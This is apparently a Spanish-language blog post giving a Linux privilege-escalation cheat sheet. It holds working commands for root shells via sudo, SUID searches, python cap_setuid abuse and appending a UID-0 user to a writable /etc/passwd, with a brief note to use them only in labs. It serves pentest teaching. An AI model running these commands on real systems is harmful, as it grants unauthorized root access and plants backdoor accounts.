Reconocimiento inicial
# Info del sistema
id && uname -a && cat /etc/os-release
# Procesos y servicios
ps aux | grep root
ss -tlnp
# Variables de entorno
env
SUID / SGID
# Buscar binarios SUID
find / -perm -4000 -type f 2>/dev/null
# Buscar binarios SGID
find / -perm -2000 -type f 2>/dev/null
Sudo
# Ver permisos sudo del usuario actual
sudo -l
# Explotar si sudo permite ejecutar bash
sudo bash
# Explotar si sudo permite python
sudo python3 -c 'import os; os.system("/bin/bash")'
Cron Jobs
# Ver cron jobs del sistema
cat /etc/crontab
ls -la /etc/cron.*
crontab -l
# Monitorear cron jobs en tiempo real
pspy64 # herramienta externa
Capabilities
# Buscar binarios con capabilities
getcap -r / 2>/dev/null
# Explotar python con cap_setuid
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
Writable Files
# Archivos escribibles por el usuario actual
find / -writable -type f 2>/dev/null | grep -v proc
# /etc/passwd escribible
echo 'root2:$(openssl passwd hacked):0:0:root:/root:/bin/bash' >> /etc/passwd
su root2
Modificar
/etc/passwd en un entorno real es altamente detectado. Usar solo en labs controlados.Conclusión
El flujo estándar es: reconocimiento → sudo → SUID → cron → capabilities → writables. Herramientas como LinPEAS automatizan este proceso pero entender cada vector manualmente es esencial.
COMPARTIR ESTE POST
// COMENTARIOS · GISCUS
Los comentarios se sincronizan con GitHub Discussions. Inicia sesión con GitHub →